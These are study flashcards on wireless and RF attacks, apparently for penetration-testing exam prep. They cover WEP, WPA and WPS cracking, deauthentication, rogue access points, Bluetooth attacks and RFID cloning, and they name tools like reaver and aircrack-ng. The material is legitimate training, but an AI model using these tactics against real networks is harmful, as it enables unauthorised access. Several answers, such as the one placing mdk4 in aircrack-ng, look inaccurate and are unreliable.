Wireless and RF Attacks

Question 1

Which organization defines and limits the power ranges that can be applied to Wi-Fi-enabled devices?

Answer 1

The Federal Communications Commission (FCC)

Question 2

What two modes do wireless networks operate in, and what do they mean?

Answer 2

1) Ad hoc mode, connected in a peer-to-peer mode 2) Infrastructure mode, communicate with a central device instead of directly communicating with eachother

Question 3

Which three frames associated with a wireless network does the 802.11 standard define?

Answer 3

Management, control, and data

Question 4

What is the process of listening to a private conversation without the other party knowing you are doing so?

Answer 4

Eavesdropping

Question 5

Which wireless security protocol was designed to allow users to set up secure wireless networks and reduce the overall complexity of associating additional hosts to a network?

Answer 5

Wi-Fi Protected Setup (WPS)

Question 6

Which wireless security protocol requires user interaction to initiate communication and uses WPA/WPA2 security and an 8-digit PIN to connect?

Answer 6

Wi-Fi Protected Setup (WPS)

Question 7

What are some common tools used to attack WPS?

Answer 7

Reaver, wash, and wifite for offline pixie dust attacks, or online brute-force PIN attacks

Question 8

What form of wireless encryption relies on a secret key that is shared between the access point and the clients on the network using the RC4 stream cipher?

Answer 8

Wired Equivalent Privacy (WEP)

Question 9

WEP was the standard before WPA. Key reuse in the encryption stream makes it vulnerable to cracking, as well as to fragmentation and replay attacks. What tools can be used to attack WEP?

Answer 9

Aireplay-ng can generate IV samples and aircrack-ng can decipher the secret key. You can also use wifite to conduct attacks against WEP.

Question 10

Which protocol is symmetric encryption that still uses the same WEP programming and RC4 encryption algorithm, but also encrypts each data packet with stronger and unique encryption keys?

Answer 10

Temporal Key Integrity Protocol (TKIP)

Question 11

WPA uses a four-way handshake and a shared passphrase. What are some of its weaknesses?

Answer 11

Dictionary attacks, deauthentication attacks which can force a new handshake to capture information. Some tools used are aricrack-ng, aireplay-ng, airodump-ng, wifite, cowpatty, genpmk, and hashcat.

Question 12

WPA3 hides the passphrase behind additional security with Dragonfly key exchange. What attacks is it susceptible to?

Answer 12

Downgrade attacks and timing attacks.

Question 13

What Kali Linux commands can be used to show compatible channels, frequencies, encryption capabilities, and further manipulate the interface by enabling or disabling it or by manually configuring it on a wireless network?

Answer 13

iw, iwlist, iwconfig

Question 14

What is a surveillance technique for discovering SSIDs, router vendor information and signal strength, MAC addresses, channels, access control protections (encryption) and more?

Answer 14

Stumbling

Question 15

What is a tactical surveillance process for surveying an area for access points while in a moving vehicle?

Answer 15

Wardriving

Question 16

What is an open-source software that provides a suite for conducting RF communication monitoring and security testing of Wi-Fi networks?

Answer 16

aircrack-ng

Question 17

What is a popular wireless sniffing tool included in the aircrack-ng toolset that can be used during a pentest to discover and validate wireless targets?

Answer 17

airodump-ng

Question 18

What tool can do 802.11 sniffing and perform wireless intrusion detection, with better GPS support than airodump-ng?

Answer 18

Kismet

Question 19

Which Kali tool can identify WPS networks and supports active probing of detected wireless networks to identify whether they support WPS?

Answer 19

wash

Question 20

After you have discovered a WPS PIN-controlled target with a tool like wash, what command can you use in Kali to brute-force attack the PIN?

Answer 20

reaver

Question 21

Which Kali tool attacks a WPS implementation weakness in the registrar functionality where it only takes 11,000 attempts to guess the correct WPS PIN?

Answer 21

reaver

Question 22

What kind of attack will speed up the WEP cracking process by injecting arbitrary packets into the wireless access point, but does not actually crack the key?

Answer 22

Fragmentation attack

Question 23

Which two tools, when used together, can crack WPA/WPA2 by building a PMK rainbow table by precomputing the hashes and saving them in a hash file and then combining them with a four-way handshake from a PCAP file to crack the key.

Answer 23

genpmk and cowpatty

Question 24

Which tool within the aircrack-ng suite of wireless attack tools can you use to launch of a denial of service attack?

Answer 24

mdk4

Question 25

Rogue AP attacks may be used for targeting Enterprise implementations that rely on RADIUS. What tools can you use to launch attacks that will help target those networks?

Answer 25

HostAP, EAPhammer, airbase-ng and aireplay-ng

Question 26

What is a popular access point software that can be run from a computer operating system like Kali Linux and allows the host to perform all the functions of a typical wireless router?

Answer 26

HostAP

Question 27

What kind of attack is an AP method used to listen for any network probe request from a client to join a given network, not just one specifically targeted network, like the evil twin attack? This attack will then rebroadcast the ESSID from the victim in order to entice the victim to connect to the evil network

Answer 27

Karma attack

Question 28

What group of standards defines specifications for various categories of wireless private area networks (WPANs) including Bluetooth and ZigBee?

Answer 28

802.15

Question 29

When hacking Bluetooth-enabled devices, what is the process of information gathering called?

Answer 29

Blueprinting

Question 30

What is the default protocol stack for Bluetooth in most Linux distributions, including Kali?

Answer 30

BlueZ

Question 31

Which attack is the process of exploiting vulnerabilities found in certain Bluetooth firmware in order to steal information from a wireless device?

Answer 31

Bluesnarfing

Question 32

Which tool in Kali Linux is capable of carrying out a Bluesnarfing attack?

Answer 32

Bluesnarfer

Question 33

What is a method of sending unsolicited messages to mobile users using Bluetooth?

Answer 33

Bluejacking

Question 34

What device is so small that it can be installed to intercept traffic between an RFID tag and reader without arousing suspicion?

Answer 34

ESPKey

Question 35

What is the process of reading a series of bits from one RFID card or key fob and writing the same series of bits to another compatible card?

Answer 35

RFID cloning

Question 36

List the 5 layers of Bluetooth

Answer 36

SDP, LMP, L2CAP, RFCOMM, and TCS

Question 37

WEP uses an encryption algorithm called RC4, which was developed by Ronald Rivest. RC4 is a ______________ cipher, which is a symmetric key cypher used to expand a short key into an infinite pseudo-random keystream.

Answer 37

Stream. RC4 is an older encryption algorithm that helps encrypt WEP networks.

Question 38

CRC-32 is an algorithm used to verify the integrity of network packets for WEP and is also found in different applications to detect changes in hardware. CRC-32 is based on the original cyclic redundancy check and is not recommended for verifying the integrity of modern-day technology due to the fact that ___________.

Answer 38

CRC-32 is a variant of CRC, which is based on a noncryptographic algorithm that offers very little assurance with regard to data manipulation.

Question 39

In order to crack WEP, you need to capture enough initialization vectors in the network packets to recover the secret key. WEP secret keys can be one of two different lengths. Ten-digit keys are 64 bits in length. How many digits are in a key length of 128 bits?

Answer 39

26

Question 40

With WPA, the wireless client and the access point both know the preshared key in order to join the network. During the authorization process, each device will use the PSK to generate a pairwise master key (PMK) in order to derive a _______________ , which is used to encrypt packets sent to the receiving host. What is this type of key called?

Answer 40

Pairwise transient key

Question 41

During a pentest, your team identifies an access point that is broadcasting the SSID value and is protected with only WEP encryption. Your team attempts to use airplay-ng to replay an injected ARP packet over the network; however, the tool has not captured any ARP replies over the network. This is likely due to the fact that no clients are talking over the network. In order to speed up the cracking process, what could you recommend your team do?

Answer 41

Use the ping command and ping nonexistent hosts on the network. The repeated use of ping against nonexistent hosts would generate multiple initialization vectors with the AP as the host, but will never be identified and the request will continue to propagate throughout the network.

Question 42

What kind of wireless attack forces a new handshake with a device to capture information needed to generate guesses.

Answer 42

Deauthentication attacks

Question 43

What is PBKDF2?

Answer 43

Password-Based Key Derivation Function 2 is a key derivation function with a sliding computational cost, used to reduce vulnerability to brute-force attacks.

Question 44

In order to crack the WPA or WPA2 PSK, you will need to capture the four-way handshake. During a pentest, your team identifies multiple clients on the target network. What is the best way to capture the handshake?

Answer 44

Deauthenticate one of the clients.